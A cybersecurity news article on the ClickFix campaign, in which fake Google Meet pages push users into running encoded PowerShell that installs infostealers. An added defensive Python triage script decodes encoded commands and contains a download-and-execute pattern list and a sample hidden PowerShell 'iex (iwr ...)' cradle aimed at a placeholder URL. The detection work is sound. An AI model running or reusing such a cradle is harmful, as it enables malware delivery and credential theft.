Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems.
“This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems,” French cybersecurity company Sekoia said in a report shared with The Hacker News.
Variations of the ClickFix (aka ClearFake and OneDrive Pastejacking) campaign have been reported widely in recent months, with threat actors employing different lures to redirect users to bogus pages that aim to deploy malware by urging site visitors to run an encoded PowerShell code to address a supposed issue with displaying content in the web browser.
These pages are known to masquerade as popular online services, including Facebook, Google Chrome, PDFSimpli, and reCAPTCHA, and now Google Meet as well as potentially Zoom.
On Windows, the attack chain culminates in the deployment of StealC and Rhadamanthys stealers, while Apple macOS users are served a booby-trapped disk image file (“Launcher_v1.94.dmg”) that drops another stealer known as Atomic.
This emerging social engineering tactic is notable for the fact that it cleverly evades detection by security tools, as it involves the users manually running the malicious PowerShell command directly on the terminal, as opposed to being automatically invoked by a payload downloaded and executed by them.
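Because the victim types or pastes the command themselves, the PowerShell command line recorded at process creation is often the best detection hook a defender has. The following is an added example, not code from the Sekoia report or this article: Python triage over constructed process-creation events that decodes `-EncodedCommand` blobs and flags ones that fetch and run remote content. The log format, the sample events, the `example.invalid` URL and the explorer.exe-parent heuristic are assumptions made for illustration.

```python
import base64
import re

# Download-and-execute primitives a pasted one-liner needs to pull its stealer.
CRADLE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if the launch has none.
    powershell.exe accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...);
    the argument is base64 of the UTF-16LE script text."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower()
        if len(flag) > 1 and flag[0] in "-/" and "encodedcommand".startswith(flag[1:]):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # flag present but blob unusable
    return None

def triage(event):
    """event is 'parent_image|image|command_line' (constructed log format)."""
    parent, image, cmdline = event.split("|", 2)
    if image.lower() not in ("powershell.exe", "pwsh.exe"):
        return None
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return None
    reasons = ["encoded command"]
    if re.search(r"-w(indowstyle)?\s+hidden", cmdline, re.I):
        reasons.append("hidden window")
    if CRADLE.search(decoded):
        reasons.append("remote fetch/execute in decoded payload")
    if parent.lower() == "explorer.exe":  # assumption: user pasted it via Run/terminal
        reasons.append("interactive launch from explorer.exe")
    return {"decoded": decoded, "reasons": reasons,
            "severity": "high" if CRADLE.search(decoded) else "review"}

def _enc(script):  # builds the constructed samples; not part of the detection
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample events (not real telemetry); example.invalid never resolves.
SAMPLE_EVENTS = [
    "explorer.exe|powershell.exe|powershell -w hidden -enc "
    + _enc("iex (iwr 'http://example.invalid/fix.ps1')"),
    "services.exe|powershell.exe|powershell -NoProfile -EncodedCommand " + _enc("Get-Date"),
    "cmd.exe|powershell.exe|powershell -Command Get-Process",
]
```

Running `triage` over `SAMPLE_EVENTS` rates the first event high, returns the second as an encoded but benign launch for review, and ignores the third because nothing was encoded.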
Sekoia has attributed the cluster impersonating Google Meet to two traffers groups, namely Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo, which are sub-teams within markopolo and CryptoLove, respectively.
“Both traffers teams […] use the same ClickFix template that impersonates Google Meet,” Sekoia said. “This discovery suggests that these teams share materials, also known as ‘landing project,’ as well as infrastructure.”
This, in turn, has raised the possibility that both the threat groups are making use of the same, as-yet-unknown cybercrime service, with a third party likely managing their infrastructure.
The development comes amid the emergence of malware campaigns distributing the open-source ThunderKitty stealer, which shares overlaps with Skuld and Kematian Stealer, as well as new stealer families named Divulge, DedSec (aka Doenerium), Duck, Vilsa, and Yunit.
“The rise of open-source infostealers represents a significant shift in the world of cyber threats,” cybersecurity company Hudson Rock noted back in July 2024.
“By lowering the barrier of entry and fostering rapid innovation, these tools could fuel a new wave of computer infections, posing challenges for cybersecurity professionals and increasing the overall risk to businesses and individuals.”